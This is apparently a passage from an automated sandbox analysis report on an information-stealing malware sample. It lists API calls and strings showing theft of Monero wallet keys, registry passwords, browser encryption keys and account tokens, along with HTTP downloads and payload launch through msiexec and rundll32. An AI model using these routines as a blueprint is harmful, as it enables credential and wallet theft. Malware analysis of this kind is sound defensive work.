                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 4d7cdd88a1996e290bef2fd469bc420f04a680bfe1234de91362a1dc86e2ed5f
                              • Instruction ID: f21428f49cd7ef8bf7c952c14d72570fda4a7d71f9ac2778a600bf3aa4f9a5ed
                              • Opcode Fuzzy Hash: 4d7cdd88a1996e290bef2fd469bc420f04a680bfe1234de91362a1dc86e2ed5f
                              • Instruction Fuzzy Hash: D812E971850118ABEB19EBA4DC92FEEB738EF14300F504159F50666192EF746B4ACFB2
                              APIs
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D36280: InternetOpenA.WININET(00D50DFE,00000001,00000000,00000000,00000000), ref: 00D362E1
                                • Part of subcall function 00D36280: StrCmpCA.SHLWAPI(?,008DE4E0), ref: 00D36303
                                • Part of subcall function 00D36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36335
                                • Part of subcall function 00D36280: HttpOpenRequestA.WININET(00000000,GET,?,008DDA88,00000000,00000000,00400100,00000000), ref: 00D36385
                                • Part of subcall function 00D36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D363BF
                                • Part of subcall function 00D36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D363D1
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45318
                              • lstrlen.KERNEL32(00000000), ref: 00D4532F
                                • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00D45364
                              • lstrlen.KERNEL32(00000000), ref: 00D45383
                              • lstrlen.KERNEL32(00000000), ref: 00D453AE
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 57bf14f3b015f5cc51893b7b48ec2f4e002c238fde2cd6765031ad430d67ce56
                              • Instruction ID: e01c59d9375ccb14bb49b967dcf183be5cab9bb966c77b2fb4cec14f3e8bbd9e
                              • Opcode Fuzzy Hash: 57bf14f3b015f5cc51893b7b48ec2f4e002c238fde2cd6765031ad430d67ce56
                              • Instruction Fuzzy Hash: E9514F309501489BEB18FF68DD92AED3779EF10305F504018F80A6B192EF34AB4ACB72
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 1de34780a173fe27d4e3d28c688c6c2d194aa1ff52d9b229a27766678d7ba334
                              • Instruction ID: 03bf1fd0a21d3eeac162d64dfc6c6d9994983c89f43bcb9717069a998d694827
                              • Opcode Fuzzy Hash: 1de34780a173fe27d4e3d28c688c6c2d194aa1ff52d9b229a27766678d7ba334
                              • Instruction Fuzzy Hash: 4FC181B594021D9BCB14EF60DC89FEE7378FB64304F004598E50AA7241EA74EA85DFB2
                              APIs
                                • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00D442EC
                              • lstrcat.KERNEL32(?,008DDF38), ref: 00D4430B
                              • lstrcat.KERNEL32(?,?), ref: 00D4431F
                              • lstrcat.KERNEL32(?,008DCF28), ref: 00D44333
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D48D90: GetFileAttributesA.KERNEL32(00000000,?,00D31B54,?,?,00D5564C,?,?,00D50E1F), ref: 00D48D9F
                                • Part of subcall function 00D39CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D39D39
                                • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                                • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                                • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                                • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                                • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                                • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                                • Part of subcall function 00D493C0: GlobalAlloc.KERNEL32(00000000,00D443DD,00D443DD), ref: 00D493D3
                              • StrStrA.SHLWAPI(?,008DDE18), ref: 00D443F3
                              • GlobalFree.KERNEL32(?), ref: 00D44512
                                • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39AEF
                                • Part of subcall function 00D39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00D34EEE,00000000,?), ref: 00D39B01
                                • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39B2A
                                • Part of subcall function 00D39AC0: LocalFree.KERNEL32(?,?,?,?,00D34EEE,00000000,?), ref: 00D39B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 00D444A3
                              • StrCmpCA.SHLWAPI(?,00D508D1), ref: 00D444C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00D444D2
                              • lstrcat.KERNEL32(00000000,?), ref: 00D444E5
                              • lstrcat.KERNEL32(00000000,00D50FB8), ref: 00D444F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 1737412b6be6c221fdb546b5dc1c9a3808b11eee5c42bc64ae0da390aa0f43f1
                              • Instruction ID: 85d808dba6ff9c7c2728c32233cbd6c392c06fb9a4f58c6b412f82e6e7823c6f
                              • Opcode Fuzzy Hash: 1737412b6be6c221fdb546b5dc1c9a3808b11eee5c42bc64ae0da390aa0f43f1
                              • Instruction Fuzzy Hash: 16716876900208ABDB14FBA4DC95FEE7779EB88300F044598F60997181DA74DB49DFB2
                              APIs
                                • Part of subcall function 00D312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D312B4
                                • Part of subcall function 00D312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00D312BB
                                • Part of subcall function 00D312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D312D7
                                • Part of subcall function 00D312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D312F5
                                • Part of subcall function 00D312A0: RegCloseKey.ADVAPI32(?), ref: 00D312FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3134F
                              • lstrlen.KERNEL32(?), ref: 00D3135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00D31377
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,008D9BB8,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00D31465
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                                • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                                • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                                • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                                • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                                • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00D314EF
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 72398f68d8b9b71f321549ce3f882440669de69b072d5edd7fc709688a6ed5f6
                              • Instruction ID: 601eb34392c771e531b7e9f6cfbe200e126b9c93c720efc303f8151ab83eb3f5
                              • Opcode Fuzzy Hash: 72398f68d8b9b71f321549ce3f882440669de69b072d5edd7fc709688a6ed5f6
                              • Instruction Fuzzy Hash: FB512FB1D901195BDB15FB64DD92BED733CEF54304F404598B60AA2082EE306B8ACFB6
                              APIs
                                • Part of subcall function 00D372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D3733A
                                • Part of subcall function 00D372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D373B1
                                • Part of subcall function 00D372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D3740D
                                • Part of subcall function 00D372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00D37452
                                • Part of subcall function 00D372D0: HeapFree.KERNEL32(00000000), ref: 00D37459
                              • lstrcat.KERNEL32(00000000,00D517FC), ref: 00D37606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00D37648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00D3765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00D3768F
                              • lstrcat.KERNEL32(00000000,00D51804), ref: 00D376A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00D376D3
                              • lstrcat.KERNEL32(00000000,00D51808), ref: 00D376ED
                              • task.LIBCPMTD ref: 00D376FB
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 7d343485202a4926a730b86ca5bf95cb56793ab4b397000ad290931cc87b2611
                              • Instruction ID: d065a23e2726e6dbd8d1f511213f5da41ddef5b2133168077adee27f917abe36
                              • Opcode Fuzzy Hash: 7d343485202a4926a730b86ca5bf95cb56793ab4b397000ad290931cc87b2611
                              • Instruction Fuzzy Hash: 9E314DB2900209DFCB54EBE4DC96DEE7775EB88302F144118F516A7290DA34A986EB72
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008DDD70,00000000,?,00D50E2C,00000000,?,00000000), ref: 00D48130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D48137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00D48158
                              • __aulldiv.LIBCMT ref: 00D48172
                              • __aulldiv.LIBCMT ref: 00D48180
                              • wsprintfA.USER32 ref: 00D481AC
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: 6b2a66a6044c365642848bf03d7167958be8954e4a1aad7b45c4a097151ad56b
                              • Instruction ID: 877e525ff5400aef074d791fb6aecc1f182bd687c8a8999bce680638bb61de91
                              • Opcode Fuzzy Hash: 6b2a66a6044c365642848bf03d7167958be8954e4a1aad7b45c4a097151ad56b
                              • Instruction Fuzzy Hash: 6A210BB1E44218ABDB00DFD4CC4AFAEB7B9FB44B54F104509F605BB280D778A9058BB6
                              APIs
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                                • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                              • InternetOpenA.WININET(00D50DF7,00000001,00000000,00000000,00000000), ref: 00D3610F
                              • StrCmpCA.SHLWAPI(?,008DE4E0), ref: 00D36147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00D3618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00D361B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00D361DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D3620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00D36249
                              • InternetCloseHandle.WININET(?), ref: 00D36253
                              • InternetCloseHandle.WININET(00000000), ref: 00D36260
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: c8fffad00e0a07d1e009029f35d58ed22c993e8899896e254873efa8b2148700
                              • Instruction ID: e75e1048205036c04572065f5237e672b4670246759d32a813b0ab9a8395bd73
                              • Opcode Fuzzy Hash: c8fffad00e0a07d1e009029f35d58ed22c993e8899896e254873efa8b2148700
                              • Instruction Fuzzy Hash: BD5150B194021CABEB24DF50DC45BEE77B8EB44705F108098B609A71C1DB74AA89DFB6
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D3733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D373B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D3740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00D37452
                              • HeapFree.KERNEL32(00000000), ref: 00D37459
                              • task.LIBCPMTD ref: 00D37555
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: b779cb7da26da02fb9a65d578dba23d0867b7e965867f879a82fc497cc768131
                              • Instruction ID: 514d193a8e801a48b5a9c13d87f173a6f629f3a229c0a60f3dd8b821bb5ba0a5
                              • Opcode Fuzzy Hash: b779cb7da26da02fb9a65d578dba23d0867b7e965867f879a82fc497cc768131
                              • Instruction Fuzzy Hash: DA612BB590426C9BDB24DB50CC51BDAB7B8FF48300F0481E9E689A6141DBB06BC9CFB1
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                              • lstrlen.KERNEL32(00000000), ref: 00D3BC9F
                                • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00D3BCCD
                              • lstrlen.KERNEL32(00000000), ref: 00D3BDA5
                              • lstrlen.KERNEL32(00000000), ref: 00D3BDB9
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 0a5b3f98a1e5ddfd4f90300e473f8cd2407d11acfd7941a1e0a4bf28a86fb1a5
                              • Instruction ID: 27a289a3259ceb67e6dc5e55f6be3076e9db77044a696cfda1f2f93b95af7063
                              • Opcode Fuzzy Hash: 0a5b3f98a1e5ddfd4f90300e473f8cd2407d11acfd7941a1e0a4bf28a86fb1a5
                              • Instruction Fuzzy Hash: 61B15F72950118ABEF04FBA4DC96EEE7338EF54300F414569F506A6092EF346A49CBB2
                              APIs
                              Strings
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: d987220159e8c4fc5e82c0e9ef09fcaacd666e3e225fbd1d2c36a54a4f0aa0a3
                              • Instruction ID: 35a20622ada58213bfd348c63983debaa4334f62f83bb861bd3867b6b44d4494
                              • Opcode Fuzzy Hash: d987220159e8c4fc5e82c0e9ef09fcaacd666e3e225fbd1d2c36a54a4f0aa0a3
                              • Instruction Fuzzy Hash: 18F05E3090420DEFD3489FF0E90972C7B70FB45703F050198E60E86690D6748B83ABA7
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D34FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D34FD1
                              • InternetOpenA.WININET(00D50DDF,00000000,00000000,00000000,00000000), ref: 00D34FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00D35011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00D35041
                              • InternetCloseHandle.WININET(?), ref: 00D350B9
                              • InternetCloseHandle.WININET(?), ref: 00D350C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 7c55d37d5d122d3b77c2ecf0237ce6985420fd2eb320b098b5149db6ff8bfbef
                              • Instruction ID: e955d30631bdd7225d3fdf163ddb96ec1ec675c57b0ed42a263d6c6287f911b2
                              • Opcode Fuzzy Hash: 7c55d37d5d122d3b77c2ecf0237ce6985420fd2eb320b098b5149db6ff8bfbef
                              • Instruction Fuzzy Hash: F43118B4A4021CABDB24CF54DC85BDCB7B4EB48704F1081D9FA09A7280C7706EC59FA9
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D48426
                              • wsprintfA.USER32 ref: 00D48459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D4847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D4848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D48499
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,008DDDA0,00000000,000F003F,?,00000400), ref: 00D484EC
                              • lstrlen.KERNEL32(?), ref: 00D48501
                              • RegQueryValueExA.ADVAPI32(00000000,008DDD10,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00D50B34), ref: 00D48599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D48608
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D4861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: a0b56d8e27978c86d6b938c089e6b6d001feca56a095a2070c67813b62465333
                              • Instruction ID: df9d4c486a0a8c269230634400afcae761c012007c2b8a12a3b58eb5f287d778
                              • Opcode Fuzzy Hash: a0b56d8e27978c86d6b938c089e6b6d001feca56a095a2070c67813b62465333
                              • Instruction Fuzzy Hash: ED210A7190021C9BDB64DB54DC85FE9B3B8FB48700F04C198E609A6180DF716A85DFE5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D476A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D476AB
                              • RegOpenKeyExA.ADVAPI32(80000002,008CB888,00000000,00020119,00000000), ref: 00D476DD
                              • RegQueryValueExA.ADVAPI32(00000000,008DDCF8,00000000,00000000,?,000000FF), ref: 00D476FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D47708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: a328e1141c2c01a32271ec93e3064dc3449d232884625a6ae53a4418fd1d50a1
                              • Instruction ID: 08db1175388a9351d8f3cee2affad0615e3a42b9e829ddcc0f9e8650bde4c370
                              • Opcode Fuzzy Hash: a328e1141c2c01a32271ec93e3064dc3449d232884625a6ae53a4418fd1d50a1
                              • Instruction Fuzzy Hash: 110162B5A44208BFDB00DBE4DC49F6DB7B8EB88701F104454FA08D7291D77099449F63
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D4773B
                              • RegOpenKeyExA.ADVAPI32(80000002,008CB888,00000000,00020119,00D476B9), ref: 00D4775B
                              • RegQueryValueExA.ADVAPI32(00D476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00D4777A
                              • RegCloseKey.ADVAPI32(00D476B9), ref: 00D47784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 49ced265fe04f99129ed51ad0e83ee729a41273094271429fa881011866cde97
                              • Instruction ID: db51f9f5abcc00c6b8a5123e796caee5609ed7d59fe87d07c41ac0590ed7d6b8
                              • Opcode Fuzzy Hash: 49ced265fe04f99129ed51ad0e83ee729a41273094271429fa881011866cde97
                              • Instruction Fuzzy Hash: DB0144B5A40308BBDB00DBE0DC49FAEB7B8EB44701F004554FA09A7281D67055409B63
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                              • LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                              Memory Dump Source
